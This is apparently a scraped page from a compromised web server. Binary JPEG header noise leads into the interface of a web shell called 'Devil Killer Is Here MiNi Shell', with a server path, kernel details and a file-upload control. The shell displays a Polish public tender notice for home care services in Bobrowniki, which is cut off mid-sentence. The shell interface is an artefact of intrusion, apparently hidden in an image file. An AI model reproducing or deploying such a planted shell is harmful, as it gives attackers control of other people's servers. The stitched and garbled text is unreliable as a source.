JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241114/0059329701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług opiekuńczych i specjalistycznych usług opiekuńczych w miejscu zamieszkania chorego w gminie Bobrowniki w 2025 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ W BOBROWNIKACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003446860</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 25 C</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobieszowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-584</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0322877863</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0322877863 wew.25</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ops@bobrowniki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://ops.bobrowniki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pozostała pomoc społeczna bez zakwaterowania, gdzie indziej niesklasyfikowana </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług opiekuńczych i specjalistycznych usług opiekuńczych w miejscu zamieszkania chorego w gminie Bobrowniki w 2025 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4925d676-a39b-42e4-8e63-2a0b0e70c68f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00593297</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00013969/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 „Świadczenie usług opiekuńczych i specjalistycznych usług opiekuńczych w miejscu zamieszkania chorego w gminie Bobrowniki w 2025 roku”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4925d676-a39b-42e4-8e63-2a0b0e70c68f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/, http://bip.ops.bobrowniki.pl/, ops@bobrowniki.pl,<br/>EPUAP: /OPSBobrowniki/Skrytka_ESP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcy zobowiązani są do<br/>składania oferty, oświadczeń oraz innych dokumentów wyłącznie przy użyciu<br/>środków komunikacji elektronicznej.<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, sporządza się<br/>w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>3. Ofertę, a także oświadczenie o jakim mowa w Rozdziale IX pkt 1 SWZ składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym lub kwalifikowanym podpisem<br/>elektronicznym.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>6. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie (Dz. U. poz. 2452),<br/>sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 21<br/>maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2024 r. poz. 773), z uwzględnieniem<br/>rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Możliwość<br/>korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na<br/>Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących<br/>do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na<br/>Platformie e-Zamówienia. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB<br/>(wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). Minimalne wymagania techniczne dotyczące<br/>sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">http://bip.ops.bobrowniki.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO), informujemy:Administratorem Pani/Pana danych osobowych jest Kierownik Ośrodka Pomocy Społecznej w Bobrownikach, 42-584 Dobieszowice ul. Kościuszki 25c, tel. 32 287 78 63,<br/>e-mail: ops@bobrowniki.pl.W sprawach związanych z ochroną Pani/Pana danych osobowych można kontaktować się z<br/>wyznaczonym Inspektorem Ochrony Danych Osobowych, Panem Markiem Woźniak telefonicznie pod numerem 694 167 023, za<br/>pomocą poczty e-mail pod adresem: iodo@marwikpoland.pl lub korespondencyjnie na adres placówki.Pani/Pana danych osobowych<br/>przetwarzane będą na podstawie przepisów prawa:<br/>ustawa z dnia 11 września 2019 roku Prawo zamówień publicznych (t.j. - Dz. U. z 2024 r. poz. 1320 z późn. zm..),<br/>Odbiorcą tych będą:upoważnieni pracownicy,wszystkie zainteresowane podmioty i osoby, gdyż co do zasady postępowanie o<br/>udzielenie zamówienia publicznego jest jawne, ograniczenie dostępu do Państwa danych o których mowa wyżej może wystąpić<br/>jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 18 ust 5 pkt 1 i 2 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (t.j. - Dz. U. z 2024 r. poz. 1320 z późn. zm.),Ponadto odbiorcą danych zawartych w<br/>dokumentach związanych z postępowaniem o zamówienie publiczne mogą być podmioty, z którymi Administrator zawarł umowy lub<br/>porozumienie na korzystanie z udostępnianych przez nie systemów informatycznych w zakresie przekazywania lub archiwizacji<br/>danych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie do możliwości zapoznania się z tymi danymi<br/>w związku ze świadczeniem usług wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania<br/>poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.Przysługujące Państwu uprawnienia<br/>związane z przetwarzaniem danych osobowych w odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o<br/>udzielenie zamówienia publicznego przysługują Państwu następujące uprawnienia: prawo dostępu do swoich danych oraz<br/>otrzymania ich kopii;prawo do sprostowania (poprawiania) lub uzupełnienia swoich danych, jednakże nie może to skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą,prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z<br/>obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej;prawo do ograniczenia przetwarzania<br/>danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego praw,prawo do wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych. Aby skorzystać z powyższych praw, należy się skontaktować z nami lub z naszym<br/>inspektorem ochrony danych.Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia publiczne nie jest<br/>obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że w zależności od przedmiotu<br/>zamówienia, zamawiający może żądać ich podania na podstawie przepisów ustawy Prawo zamówień publicznych (t.j. - Dz. U. z<br/>2024 r. poz. 1320 z późn. zm.) oraz wydanych do niej przepisów wykonawczych, a w szczególności na podstawie rozporządzenia<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz 2415 z późn. zm.).Pani/Pana<br/>dane nie będą przekazywane do państw trzecich.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS.271.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 164000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług opiekuńczych objętych zamówieniem odbywać się będzie przez 7 dni w tygodniu z uwzględnieniem dni<br/>wolnych od pracy i świąt.<br/>Usługi będą świadczone na bieżąco według potrzeb przedstawionych przez Ośrodek Pomocy Społecznej w Bobrownikach.<br/>Do zadań Wykonawcy w zakresie usług opiekuńczych należy:<br/>1.Realizowanie przedmiotowego zadania zgodnie z zakresem dostosowanym do szczególnych potrzeb osób wymagających<br/>pomocy ww. formie, takich jak: szczegółowy zakres usług opiekuńczych, szczegółowy zakres specjalistycznych usług<br/>opiekuńczych,<br/>2.Podjęcie czynności związanych ze świadczeniem usług w ciągu 24 godzin od chwili zgłoszenia o potrzebie ich<br/>zapewnienia, a w przypadku nagłym niezwłocznie po otrzymaniu zgłoszenia. Wykonawca otrzyma Zgłoszenie wejścia w<br/>środowisko. Ze względu na dobro i potrzeby osób, na rzecz których świadczone są usługi opiekuńcze, specjalistyczne usługi<br/>opiekuńcze w wyjątkowych przypadkach Zamawiający dopuszcza możliwość ustnego (np. telefonicznego) i pisemnego (np.<br/>e-mailem) poinformowania Wykonawcy o terminie rozpoczęcia lub przerwania realizacji usługi. Każde tego typu zdarzenie<br/>wymagać będzie sporządzenia stosownej dokumentacji w formie pisemnej. Współpraca na bieżąco z pracownikami<br/>Zamawiającego. Przez współpracę rozumie się wymianę informacji dotyczącą osób korzystających ze wsparcia w formie<br/>usług, które to stanowią przedmiot zamówienia, a są związane z realizacją przedmiotu zamówienia np. zmianę stanu<br/>zdrowia, mających wpływ na zakres świadczonych usług, brak możliwości wykonania usług spowodowany odmową klienta.<br/>Informacje powinny być niezwłocznie zgłaszane na piśmie lub telefonicznie Zamawiającemu. Zapewnienie osobom<br/>wykonującym usługi wyposażenia w odpowiednie ubranie ochronne dostosowane do zakresu niesionej pomocy (rękawiczki, fartuchy itp.).Zapewnienie klientowi niezbędnej pomocy w sytuacjach nagłych, w szczególności takich jak: odniesienie<br/>poważnych obrażeń, ciężki stan zdrowia, zatrucie pokarmowe lub choroba zakaźna, zniszczenie domu w wyniku<br/>wandalizmu lub pożaru, kradzież na szkodę klienta, wypadki następujące podczas świadczenia usług.<br/>Szczegółowy zakres usług opiekuńczych na podstawie art. 50 ust. 3 i 5 Ustawy o pomocy społecznej (tekst jednolity Dz. U. z<br/>2024 poz. 1283 z późn. zm.)zaspokajanie codziennych potrzeb życiowych, w szczególności:pomoc w ubieraniu się,zakup<br/>artykułów spożywczych i innych potrzebnych w gospodarstwie domowym, palenie w piecu, przynoszenie opału, wody (w<br/>razie potrzeby), przynoszenie lub przygotowywanie posiłków z uwzględnieniem diety zleconej przez<br/>lekarza, karmienie oraz sprzątanie po posiłku, utrzymanie w czystości naczyń stołowych, kuchennych i innego sprzętu<br/>gospodarstwa, domowego służącego podopiecznemu, pranie bielizny osobistej podopiecznego, pranie lub zanoszenie i<br/>odbieranie bielizny pościelowej i odzieży do/z pralni, prasowanie, bieżące utrzymanie w czystości mieszkania osoby objętej<br/>pomocą, w szczególności: wynoszenie śmieci i okresowe generalne sprzątanie mieszkania, mycie okien (raz na 3 miesiące),<br/>wezwanie lekarza w sytuacjach wymagających jego interwencji oraz realizacja recept, załatwianie niezbędnych spraw<br/>urzędowych (poczta, administracja, bank itp.), zgłaszanie napraw urządzeń domowych, świadczenie podstawowej opieki<br/>higieniczno-sanitarnej, w szczególności: zapewnienie higieny osobistej podopiecznego (pomoc przy toalecie porannej,<br/>wieczornej np. mycie, kąpanie, czesanie, golenie, mycie głowy, obcinanie paznokci itp.),pomoc przy załatwianiu potrzeb<br/>fizjologicznych w tym: zmiana pieluch, zmiana bielizny osobistej i pościelowej, przesłanie łóżka podopiecznego,<br/>zapobieganie powstawaniu odleżyn i odparzenia ciała podopiecznego, układanie podopiecznego w łóżku i pomoc przy<br/>zmianie pozycji ciała u osób nieporuszających się, zapewnienie kontaktów z otoczeniem: pomoc w komunikowaniu się z<br/>innymi osobami, pomoc w poruszaniu się, w szczególności w dojściu na zabiegi medyczne, rehabilitacyjne, do lekarza itp.<br/>towarzyszenie w spacerach, czytanie prasy, książek, listów, itp., wykonywanie wszelkich innych czynności niezbędnych do<br/>zapewnienia kontaktów z otoczeniem, powiadamianie rodziny lub lekarza rodzinnego o istotnych zmianach w zachowaniu<br/>podopiecznego wskazujących na pogorszenie stanu zdrowia, okazywanie wsparcia emocjonalnego w doświadczeniach<br/>egzystencjalnych: samotności, cierpieniu i umieraniu. prowadzenie zeszytu wydatków i rozliczanie się z podopiecznym z<br/>wydanych pieniędzy.<br/>Szczegółowy zakres specjalistycznych usług opiekuńczych na podstawie art. 50 ust. 4 Ustawy o pomocy społecznej (t.j. Dz.<br/>U. z 2024 poz. 1283) oraz rozporządzenia Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie<br/>specjalistycznych usług opiekuńczych (t.j. Dz. U. z 2024 r. poz. 816).<br/>Zgodnie z § 2 ww. rozporządzenia ustala się następujące rodzaje specjalistycznych usług opiekuńczych dostosowanych do<br/>szczególnych potrzeb osób wymagających pomocy w formie specjalistycznych usług opiekuńczych, wynikających z rodzaju<br/>ich schorzenia lub niepełnosprawności, świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym: uczenie<br/>i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza: kształtowanie umiejętności zaspokajania<br/>podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności, leczenia i<br/>rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie<br/>asystowania w codziennych czynnościach życiowych, w szczególności takich jak: samoobsługa, zwłaszcza wykonywanie<br/>czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu, dbałość o higienę i wygląd,<br/>utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością lokalną, wspólne<br/>organizowanie i spędzanie czasu wolnego, korzystanie z usług różnych instytucji, interwencje i pomoc w życiu w rodzinie, w<br/>tym: pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo specjalistyczne, interwencje kryzysowe, wsparcie<br/>psychologiczne, rozmowy terapeutyczne, ułatwienie dostępu do edukacji i kultury, doradztwo, koordynacja działań innych<br/>służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług, kształtowanie<br/>pozytywnych relacji osoby wspieranej z osobami bliskimi, współpraca z rodziną - kształtowanie odpowiednich postaw wobec<br/>osoby chorującej, niepełnosprawnej, pomoc w załatwianiu spraw urzędowych, w tym: w uzyskaniu świadczeń socjalnych,<br/>emerytalno-rentowych, w wypełnieniu dokumentów urzędowych, wspieranie i pomoc w uzyskaniu zatrudnienia, w tym<br/>zwłaszcza: w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia lub alternatywnego zajęcia, w szczególności<br/>uczestnictwo w zajęciach warsztatów terapii zajęciowej, zakładach aktywności zawodowej, środowiskowych domach<br/>samopomocy, centrach i klubach integracji społecznej, klubach pracy, w kompletowaniu dokumentów potrzebnych do<br/>zatrudnienia, w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą, w<br/>rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku,<br/>pomoc w gospodarowaniu pieniędzmi, w tym: nauka planowania budżetu, asystowanie przy ponoszeniu wydatków, pomoc<br/>w uzyskaniu ulg w opłatach, zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie<br/>finansowe; pielęgnacja - jako wspieranie procesu leczenia, w tym:<br/>a) pomoc w dostępie do świadczeń zdrowotnych,<br/>b) uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,<br/>c) pomoc w wykupywaniu lub zamawianiu leków w aptece,<br/>d) pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania,<br/>e) w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów<br/>medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny,<br/>f) pomoc w dotarciu do placówek służby zdrowia,<br/>g) pomoc w dotarciu do placówek rehabilitacyjnych;<br/>rehabilitacja fizyczna i usprawnianie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27<br/>sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (tj. Dz. U. z 2024 r , poz. 146):<br/>a) zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii,<br/>b) współpraca ze specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno-terapeutycznego<br/>zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług;<br/>pomoc mieszkaniowa, w tym:<br/>a) w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,<br/>Ogłoszenie nr 2024/BZP 00592275/01 z dnia 2024-11-13<br/>2024-11-13 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>b) w organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,<br/>c) kształtowanie właściwych relacji osoby uzyskującej pomoc z sąsiadami i gospodarzem domu<br/>Określenie wymagań niezbędnych do realizacji zamówienia.<br/>Specjalistyczne usługi 